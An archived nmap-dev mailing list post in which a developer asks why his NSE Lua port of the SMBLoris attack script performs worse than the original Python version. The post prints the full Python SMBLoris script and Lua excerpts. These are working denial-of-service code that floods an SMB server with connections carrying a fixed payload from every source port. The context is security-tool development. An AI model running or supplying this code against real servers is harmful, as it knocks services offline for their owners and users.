NSE-nsock issues?

[Wong Wai Tuck <wongwaituck () gmail com>]

Hey list

I currently facing a problem Was hoping someone could clarify this odd
behaviour. I was implementing the smb-smbloris script and I faced this odd
issue which did not occur in the Python implementation of smbloris and was
wondering if anyone could provide any insights as to why this is happening.

Here is the original smbloris in Python (written by zerosum0x0):
import sys
import socket
import resource

rhost = sys.argv[1]
rport = sys.argv[2]

resource.setrlimit(resource.RLIMIT_NOFILE, (70000, 70000))

sks = {}

while True:
for lport in range(1, 65536):
try:
if lport in sks:
sks[lport].close()
sk = socket.socket()
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sk.bind(('0.0.0.0', lport))
sk.connect((rhost, int(rport)))
sk.send('\x00\x01\xff\xff')

sks[lport] = sk

except Exception as e:
print("%s - Port: %d" % (str(e), lport))

The script executes well.

However, the Lua implementation that I have made for NSE performs poorly:
local function send_dos(host, port, src_port)
  if host_down then
    return
  end

  local oldsocket = skts[src_port]
  if oldsocket then
    oldsocket:close()
  end

  local socket = nmap.new_socket()

  local try = nmap.new_try()

  stdnse.debug1("Trying to send from %s", src_port)
  try(socket:bind("0.0.0.0", src_port))

  local status, err = socket:connect(host, port)
  socket:send(SMBLORIS_PAYLOAD)
  if status then
    if not oldsocket then
      table.insert(skts, socket)
    else
      skts[src_port] = socket
    end
  end

-- the action function
while not timed_out or not host_down do
    -- using 65000 instead of 65535 prevents crash of too many files open
    for i=1, 65000, 1 do
      send_dos(host, port, i)

      if i % 1000 == 0 and i <= 60000 then
        -- prevents crash when i >= 61000
        check_alive(host, mean, ci)
      end

      -- has it timed out yet?
      if nmap.clock() - timeout >= script_start then
        stdnse.debug1("Script timed out at %s", timeout)
        break
      end
    end
  end

You can find the full script in the PR here [2].

Even after commenting out the differences for the following lines in the
Python implementation:
resource.setrlimit(resource.RLIMIT_NOFILE, (70000, 70000))
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

The Python implementation still outperforms the NSE implementation, even if
the code is nearly identical. The results can be found here [1].

I have tried playing with the timeouts, using OS given sockets instead of
assigning my own, using threads (which ironically made it perform even
worse), and I can't seem to get it to work better.

Additionally, I am not sure if this is the cause I noticed that as more
connections are made, the speed at which the connections are made are much
slower in NSE than the Python implementation. I am not exactly sure what is
the cause, but if someone could point me in the right direction that would
be helpful! I have tried to adjust the min-rate argument, as well as the
max-parallelism argument (which is apparently used nsock NSE file from what
I read from the source), both of which did not have the effect I was hoping
for.

[1]: http://imgur.com/a/AAdG3
[2]: https://github.com/nmap/nmap/pull/983

Wai Tuck

_______________________________________________
Sent through the dev mailing list
https://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/